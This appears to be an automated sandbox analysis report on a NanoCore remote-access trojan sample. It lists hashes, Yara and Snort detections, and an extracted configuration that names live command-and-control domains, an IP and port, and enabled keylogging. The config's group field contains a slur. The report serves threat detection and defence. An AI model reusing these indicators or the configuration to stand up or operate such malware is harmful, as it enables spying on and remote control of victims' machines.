Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SviRsoKz6E.exe

Overview

General Information

Sample Name:SviRsoKz6E.exe
Analysis ID:381760
MD5:5d59200d61ba34e07e26132f5acd9619
SHA1:8fb59154fe08e09b2e9c2f817157b5bc0ccf1dae
SHA256:95f117deabf4aeb36402033a7ca35e717f7a31c8bf9330acbf8934fb483c5d3e
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SviRsoKz6E.exe (PID: 2212 cmdline: 'C:\Users\user\Desktop\SviRsoKz6E.exe' MD5: 5D59200D61BA34E07E26132F5ACD9619)
    • SviRsoKz6E.exe (PID: 632 cmdline: 'C:\Users\user\Desktop\SviRsoKz6E.exe' MD5: 5D59200D61BA34E07E26132F5ACD9619)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6a8cfd5d-4b59-4ef3-89b5-b939bcb2", "Group": "Faggy", "Domain1": "justinalwhitedd554.duckdns.org", "Domain2": "paymentmaba.sinsincity.com", "Port": 7632, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x111e5:$x1: NanoCore.ClientPluginHost
  • 0x11222:$x2: IClientNetworkHost
  • 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x10f4d:$a: NanoCore
    • 0x10f5d:$a: NanoCore
    • 0x11191:$a: NanoCore
    • 0x111a5:$a: NanoCore
    • 0x111e5:$a: NanoCore
    • 0x10fac:$b: ClientPlugin
    • 0x111ae:$b: ClientPlugin
    • 0x111ee:$b: ClientPlugin
    • 0x110d3:$c: ProjectData
    • 0x11ada:$d: DESCrypto
    • 0x194a6:$e: KeepAlive
    • 0x17494:$g: LogClientMessage
    • 0x1368f:$i: get_Connected
    • 0x11e10:$j: #=q
    • 0x11e40:$j: #=q
    • 0x11e5c:$j: #=q
    • 0x11e8c:$j: #=q
    • 0x11ea8:$j: #=q
    • 0x11ec4:$j: #=q
    • 0x11ef4:$j: #=q
    • 0x11f10:$j: #=q
    00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    Click to see the 29 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    2.2.SviRsoKz6E.exe.56a0000.9.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe75:$x1: NanoCore.ClientPluginHost
    • 0xe8f:$x2: IClientNetworkHost
    2.2.SviRsoKz6E.exe.56a0000.9.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe75:$x2: NanoCore.ClientPluginHost
    • 0x1261:$s3: PipeExists
    • 0x1136:$s4: PipeCreated
    • 0xeb0:$s5: IClientLoggingHost
    2.2.SviRsoKz6E.exe.4f70000.7.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    2.2.SviRsoKz6E.exe.4f70000.7.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    2.2.SviRsoKz6E.exe.4f70000.7.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 81 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\SviRsoKz6E.exe, ProcessId: 632, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000002.00000002.463943126.00000000034F3000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6a8cfd5d-4b59-4ef3-89b5-b939bcb2", "Group": "Faggy", "Domain1": "justinalwhitedd554.duckdns.org", "Domain2": "paymentmaba.sinsincity.com", "Port": 7632, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dllVirustotal: Detection: 20%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dllReversingLabs: Detection: 48%
      Source: C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exeVirustotal: Detection: 39%Perma Link
      Source: C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exeReversingLabs: Detection: 72%
      Multi AV Scanner detection for submitted fileShow sources
      Source: SviRsoKz6E.exeVirustotal: Detection: 39%Perma Link
      Source: SviRsoKz6E.exeReversingLabs: Detection: 72%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.463943126.00000000034F3000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORY
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPE
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: SviRsoKz6E.exeJoe Sandbox ML: detected
      Source: 2.2.SviRsoKz6E.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.1.SviRsoKz6E.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.SviRsoKz6E.exe.56b0000.11.unpackAvira: Label: TR/NanoCore.fadte
      Source: 0.2.SviRsoKz6E.exe.30f0000.3.unpackAvira: Label: TR/Patched.Ren.Gen

      Compliance:

      barindex
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeUnpacked PE file: 2.2.SviRsoKz6E.exe.400000.1.unpack
      Source: SviRsoKz6E.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: SviRsoKz6E.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: SviRsoKz6E.exe, 00000002.00000002.460484829.00000000006B5000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdbUGP source: SviRsoKz6E.exe, 00000000.00000003.197706489.00000000035D0000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: SviRsoKz6E.exe, 00000000.00000003.197706489.00000000035D0000.00000004.00000001.sdmp
      Source: Binary string: ll\System.pdb source: SviRsoKz6E.exe, 00000002.00000003.288689683.0000000005B4B000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: SviRsoKz6E.exe, 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00406435 FindFirstFileA,FindClose,0_2_00406435
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00405889 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405889
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49702 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49703 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49711 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49723 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49732 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49735 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49737 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49739 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49748 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49749 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49750 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49751 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49752 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49755 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49756 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49757 -> 104.37.1.32:7632
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49758 -> 104.37.1.32:7632
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: justinalwhitedd554.duckdns.org
      Source: Malware configuration extractorURLs: paymentmaba.sinsincity.com
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: justinalwhitedd554.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.3:49702 -> 104.37.1.32:7632
      Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
      Source: unknownDNS traffic detected: queries for: justinalwhitedd554.duckdns.org
      Source: SviRsoKz6E.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: SviRsoKz6E.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00405326 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405326
      Source: SviRsoKz6E.exe, 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.463943126.00000000034F3000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORY
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.466831873.00000000056A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.56a0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.24941a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
